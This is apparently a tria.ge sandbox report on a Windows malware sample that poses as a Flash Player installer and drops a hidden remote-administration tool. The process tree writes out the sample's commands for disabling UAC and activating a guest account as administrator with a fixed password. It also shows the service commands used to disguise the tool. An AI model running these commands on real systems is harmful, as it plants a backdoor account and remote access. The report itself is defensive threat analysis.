Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
01/08/2022, 05:48
Static task
static1
Behavioral task
behavioral1
Sample
5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe
Resource
win7-20220715-en
General
-
Target
5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe
-
Size
13.8MB
-
MD5
7092d2964964ec02188ecf9f07aefc88
-
SHA1
e87994b619b5139e20b14db2a8b2d0a41e36a6e2
-
SHA256
5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb
-
SHA512
6da77c955071b7f1a430ce4f559ee655658fdd1392c9136a9359a62e6270d0b1f2bfe616173911ae0cdb331200fa204dce63c5df16db08b6e03a41f9c3215a6c
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x0006000000022ed8-202.dat acprotect behavioral2/files/0x0006000000022ed7-201.dat acprotect -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
resource yara_rule behavioral2/files/0x0006000000022ed6-154.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed6-155.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed6-172.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed6-181.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed6-190.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed5-203.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed5-208.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed5-207.dat aspack_v212_v242 behavioral2/files/0x0006000000022ed5-228.dat aspack_v212_v242 -
Executes dropped EXE 12 IoCs
pid Process 544 flashplayer32_xa_install.exe 636 svchost.exe 1588 F1.exe 4328 rutserv.exe 4400 rms_id_testfix.exe 4440 rms_id_test.exe 4512 rutserv.exe 4872 rutserv.exe 4988 rutserv.exe 1952 rfusclient.exe 1068 rfusclient.exe 3152 rfusclient.exe -
resource yara_rule behavioral2/files/0x0006000000022ed8-202.dat upx behavioral2/files/0x0006000000022ed7-201.dat upx -
resource yara_rule behavioral2/files/0x0007000000022e84-136.dat vmprotect behavioral2/files/0x0007000000022e84-137.dat vmprotect behavioral2/memory/636-138-0x0000000000860000-0x0000000001C93000-memory.dmp vmprotect behavioral2/memory/636-162-0x0000000000860000-0x0000000001C93000-memory.dmp vmprotect behavioral2/memory/636-169-0x0000000000860000-0x0000000001C93000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation F1.exe Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 69 api.ipify.org 72 api.ipify.org -
AutoIT Executable 7 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/636-138-0x0000000000860000-0x0000000001C93000-memory.dmp autoit_exe behavioral2/memory/636-162-0x0000000000860000-0x0000000001C93000-memory.dmp autoit_exe behavioral2/files/0x0006000000022ed0-164.dat autoit_exe behavioral2/files/0x0007000000022e85-166.dat autoit_exe behavioral2/files/0x0007000000022e85-167.dat autoit_exe behavioral2/files/0x0006000000022ed0-168.dat autoit_exe behavioral2/memory/636-169-0x0000000000860000-0x0000000001C93000-memory.dmp autoit_exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1396 sc.exe 4348 sc.exe 4492 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid Process 4308 timeout.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings F1.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\MIME\Database rms_id_testfix.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset rms_id_testfix.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage rms_id_testfix.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\MIME\Database rms_id_test.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset rms_id_test.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage rms_id_test.exe -
Runs .reg file with regedit 2 IoCs
pid Process 4252 regedit.exe 4280 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 636 svchost.exe 636 svchost.exe 636 svchost.exe 636 svchost.exe 4328 rutserv.exe 4328 rutserv.exe 4328 rutserv.exe 4328 rutserv.exe 4328 rutserv.exe 4328 rutserv.exe 4512 rutserv.exe 4512 rutserv.exe 4872 rutserv.exe 4872 rutserv.exe 4988 rutserv.exe 4988 rutserv.exe 4988 rutserv.exe 4988 rutserv.exe 4988 rutserv.exe 4988 rutserv.exe 1952 rfusclient.exe 1952 rfusclient.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 3152 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4328 rutserv.exe Token: SeDebugPrivilege 4872 rutserv.exe Token: SeTakeOwnershipPrivilege 4988 rutserv.exe Token: SeTcbPrivilege 4988 rutserv.exe Token: SeTcbPrivilege 4988 rutserv.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 4400 rms_id_testfix.exe 4400 rms_id_testfix.exe 4400 rms_id_testfix.exe 4440 rms_id_test.exe 4440 rms_id_test.exe 4440 rms_id_test.exe 4440 rms_id_test.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 4400 rms_id_testfix.exe 4400 rms_id_testfix.exe 4400 rms_id_testfix.exe 4440 rms_id_test.exe 4440 rms_id_test.exe 4440 rms_id_test.exe 4440 rms_id_test.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 544 flashplayer32_xa_install.exe 544 flashplayer32_xa_install.exe 544 flashplayer32_xa_install.exe 544 flashplayer32_xa_install.exe 4328 rutserv.exe 4512 rutserv.exe 4872 rutserv.exe 4988 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2848 wrote to memory of 544 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 84 PID 2848 wrote to memory of 544 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 84 PID 2848 wrote to memory of 544 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 84 PID 2848 wrote to memory of 636 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 86 PID 2848 wrote to memory of 636 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 86 PID 2848 wrote to memory of 636 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 86 PID 636 wrote to memory of 1588 636 svchost.exe 90 PID 636 wrote to memory of 1588 636 svchost.exe 90 PID 636 wrote to memory of 1588 636 svchost.exe 90 PID 1588 wrote to memory of 4116 1588 F1.exe 91 PID 1588 wrote to memory of 4116 1588 F1.exe 91 PID 1588 wrote to memory of 4116 1588 F1.exe 91 PID 4116 wrote to memory of 4200 4116 WScript.exe 92 PID 4116 wrote to memory of 4200 4116 WScript.exe 92 PID 4116 wrote to memory of 4200 4116 WScript.exe 92 PID 4200 wrote to memory of 4252 4200 cmd.exe 94 PID 4200 wrote to memory of 4252 4200 cmd.exe 94 PID 4200 wrote to memory of 4252 4200 cmd.exe 94 PID 4200 wrote to memory of 4280 4200 cmd.exe 95 PID 4200 wrote to memory of 4280 4200 cmd.exe 95 PID 4200 wrote to memory of 4280 4200 cmd.exe 95 PID 4200 wrote to memory of 4308 4200 cmd.exe 96 PID 4200 wrote to memory of 4308 4200 cmd.exe 96 PID 4200 wrote to memory of 4308 4200 cmd.exe 96 PID 4200 wrote to memory of 4328 4200 cmd.exe 97 PID 4200 wrote to memory of 4328 4200 cmd.exe 97 PID 4200 wrote to memory of 4328 4200 cmd.exe 97 PID 636 wrote to memory of 4400 636 svchost.exe 98 PID 636 wrote to memory of 4400 636 svchost.exe 98 PID 636 wrote to memory of 4400 636 svchost.exe 98 PID 2848 wrote to memory of 4440 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 99 PID 2848 wrote to memory of 4440 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 99 PID 2848 wrote to memory of 4440 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 99 PID 4200 wrote to memory of 4512 4200 cmd.exe 100 PID 4200 wrote to memory of 4512 4200 cmd.exe 100 PID 4200 wrote to memory of 4512 4200 cmd.exe 100 PID 4200 wrote to memory of 4872 4200 cmd.exe 102 PID 4200 wrote to memory of 4872 4200 cmd.exe 102 PID 4200 wrote to memory of 4872 4200 cmd.exe 102 PID 2848 wrote to memory of 4960 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 103 PID 2848 wrote to memory of 4960 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 103 PID 2848 wrote to memory of 4960 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 103 PID 2848 wrote to memory of 4980 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 114 PID 2848 wrote to memory of 4980 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 114 PID 2848 wrote to memory of 4980 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 114 PID 2848 wrote to memory of 5032 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 113 PID 2848 wrote to memory of 5032 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 113 PID 2848 wrote to memory of 5032 2848 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe 113 PID 4960 wrote to memory of 1064 4960 net.exe 108 PID 4960 wrote to memory of 1064 4960 net.exe 108 PID 4960 wrote to memory of 1064 4960 net.exe 108 PID 4980 wrote to memory of 4160 4980 net.exe 110 PID 4980 wrote to memory of 4160 4980 net.exe 110 PID 4980 wrote to memory of 4160 4980 net.exe 110 PID 5032 wrote to memory of 4176 5032 net.exe 109 PID 5032 wrote to memory of 4176 5032 net.exe 109 PID 5032 wrote to memory of 4176 5032 net.exe 109 PID 4988 wrote to memory of 1068 4988 rutserv.exe 111 PID 4988 wrote to memory of 1068 4988 rutserv.exe 111 PID 4988 wrote to memory of 1068 4988 rutserv.exe 111 PID 4988 wrote to memory of 1952 4988 rutserv.exe 112 PID 4988 wrote to memory of 1952 4988 rutserv.exe 112 PID 4988 wrote to memory of 1952 4988 rutserv.exe 112 PID 4200 wrote to memory of 2032 4200 cmd.exe 117 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2032 attrib.exe 2784 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe"C:\Users\Admin\AppData\Local\Temp\5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\ProgramData\Microsoft\Install\flashplayer32_xa_install.exeC:\ProgramData\Microsoft\Install\flashplayer32_xa_install.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:544
-
-
C:\ProgramData\Microsoft\Install\svchost.exeC:\ProgramData\Microsoft\Install\svchost.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:636 -
C:\ProgramData\Microsoft\Install\F1.exeC:\ProgramData\Microsoft\Install\F1.exe -pklark3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Runs .reg file with regedit
PID:4252
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:4280
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:4308
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4328
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4512
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4872
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
PID:2032
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:2784
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
PID:4348
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:4492
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:1396
-
-
-
-
-
C:\ProgramData\Microsoft\Install\rms_id_testfix.exeC:\ProgramData\Microsoft\Install\rms_id_testfix.exe3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4400
-
-
-
C:\ProgramData\Microsoft\Install\rms_id_test.exeC:\ProgramData\Microsoft\Install\rms_id_test.exe2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4440
-
-
C:\Windows\SysWOW64\net.exenet user guest 1ASDqweasdqwe2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user guest 1ASDqweasdqwe3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrators guest /add2⤵
- Suspicious use of WriteProcessMemory
PID:5032
-
-
C:\Windows\SysWOW64\net.exenet user guest /active:yes2⤵
- Suspicious use of WriteProcessMemory
PID:4980
-
-
C:\Programdata\Windows\rutserv.exeC:\Programdata\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Programdata\Windows\rfusclient.exeC:\Programdata\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:1068
-
-
C:\Programdata\Windows\rfusclient.exeC:\Programdata\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1952 -
C:\Programdata\Windows\rfusclient.exeC:\Programdata\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:3152
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators guest /add1⤵PID:4176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user guest /active:yes1⤵PID:4160
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.0MB
MD54ed728f59cacce5dfc9d82b024920021
SHA1f1d69f3d09faeac47b1996703fc9b38d02ca1fd9
SHA256ef8cfe8aaed90636577db12e75afa89f0ea4fd78ea87b0d809c49cb375b0bd1f
SHA512bf9d2fd98b6a93a9714547ca603f852829a027de9ab485173669de7e63bd2010e42263c4c9bf4794c80feb0f047c561ad846e3493be9a9602251943e6d609f97
-
Filesize
4.0MB
MD54ed728f59cacce5dfc9d82b024920021
SHA1f1d69f3d09faeac47b1996703fc9b38d02ca1fd9
SHA256ef8cfe8aaed90636577db12e75afa89f0ea4fd78ea87b0d809c49cb375b0bd1f
SHA512bf9d2fd98b6a93a9714547ca603f852829a027de9ab485173669de7e63bd2010e42263c4c9bf4794c80feb0f047c561ad846e3493be9a9602251943e6d609f97
-
Filesize
1.2MB
MD50f439339fcfe0a061cc0a439780447cc
SHA1817f3f7673d8a30055ffe51ff330d57a184ec37c
SHA2569960befb3589fcb51036e9d8a268d8eb29aac214a68f57e85ef317b76dcd9455
SHA512d4e749b02c7ad9dbe045a6d63da0b7d2ae7f66e7b30136fb31d47575447ae8cd6ba86f2737175db551b838d769dbb6aecaff3d9dc6b4243e64e3060d79bf01a3
-
Filesize
1.2MB
MD50f439339fcfe0a061cc0a439780447cc
SHA1817f3f7673d8a30055ffe51ff330d57a184ec37c
SHA2569960befb3589fcb51036e9d8a268d8eb29aac214a68f57e85ef317b76dcd9455
SHA512d4e749b02c7ad9dbe045a6d63da0b7d2ae7f66e7b30136fb31d47575447ae8cd6ba86f2737175db551b838d769dbb6aecaff3d9dc6b4243e64e3060d79bf01a3
-
Filesize
953KB
MD5ff8374d9020f7c253fc7afcd7afaeaa6
SHA12bac0ea740314a5e4226805928b90d2454e03314
SHA25692cc98b2b6f08351e8a5c88bf7a4b2e0d6ae6633c0c6658dbf81ce3fe83205a0
SHA512356bf9e1d8971ef0064b1e13593ebd3f8fd39a0025eb963ce4e2d2a97251001d7d5b2fd50439c839e2760ac144e3ee3cde9276a52ff80b17762f612887372e3c
-
Filesize
953KB
MD5ff8374d9020f7c253fc7afcd7afaeaa6
SHA12bac0ea740314a5e4226805928b90d2454e03314
SHA25692cc98b2b6f08351e8a5c88bf7a4b2e0d6ae6633c0c6658dbf81ce3fe83205a0
SHA512356bf9e1d8971ef0064b1e13593ebd3f8fd39a0025eb963ce4e2d2a97251001d7d5b2fd50439c839e2760ac144e3ee3cde9276a52ff80b17762f612887372e3c
-
Filesize
941KB
MD5c462ce1548ba2b204e79812fff243fe0
SHA161573b94e1a79687a4cf2476ddf467b6e92dbc58
SHA2567ac7f765ee24129c8126e540fea2148d8ecc2c7f5b5df6fe19c5c5d8cdeba862
SHA51250b7feadbf6865da7529ce5137e8f8d25e42282e9c4a1c8c574cb3b32eed9f7900dd9b98fe67ca90eb13d4bc60f96f8eb5bfb6fa1ca8835bb8e42f562a9158fd
-
Filesize
941KB
MD5c462ce1548ba2b204e79812fff243fe0
SHA161573b94e1a79687a4cf2476ddf467b6e92dbc58
SHA2567ac7f765ee24129c8126e540fea2148d8ecc2c7f5b5df6fe19c5c5d8cdeba862
SHA51250b7feadbf6865da7529ce5137e8f8d25e42282e9c4a1c8c574cb3b32eed9f7900dd9b98fe67ca90eb13d4bc60f96f8eb5bfb6fa1ca8835bb8e42f562a9158fd
-
Filesize
11.0MB
MD5a69ef2467201431a7f23ae06fc794daf
SHA13e5d1c316a8dfd91137fc173b19119cefc929a53
SHA256275daab4d7e4bd0a307b9c3324e18c7c335fe072ee4ae922b20a4f12209aef74
SHA5125e5bcf0faa165df250db0c68b4c01f99c5994802ee4a58af41438a3f362b78280c007c02fa5431393e06698798a0a8512f511623f204e24b5ae7a871f97c6af4
-
Filesize
11.0MB
MD5a69ef2467201431a7f23ae06fc794daf
SHA13e5d1c316a8dfd91137fc173b19119cefc929a53
SHA256275daab4d7e4bd0a307b9c3324e18c7c335fe072ee4ae922b20a4f12209aef74
SHA5125e5bcf0faa165df250db0c68b4c01f99c5994802ee4a58af41438a3f362b78280c007c02fa5431393e06698798a0a8512f511623f204e24b5ae7a871f97c6af4
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
418B
MD5db76c882184e8d2bac56865c8e88f8fd
SHA1fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92
-
Filesize
140B
MD55e36713ab310d29f2bdd1c93f2f0cad2
SHA17e768cca6bce132e4e9132e8a00a1786e6351178
SHA256cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA5128e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1
-
Filesize
13KB
MD50bfedf7b7c27597ca9d98914f44ccffe
SHA1e4243e470e96ac4f1e22bf6dcf556605c88faaa9
SHA2567e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e
SHA512d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d
-
Filesize
1KB
MD56a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1235a78495192fc33f13af3710d0fe44e86a771c9
SHA2564ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
155KB
MD588318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
Filesize
593KB
MD56298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe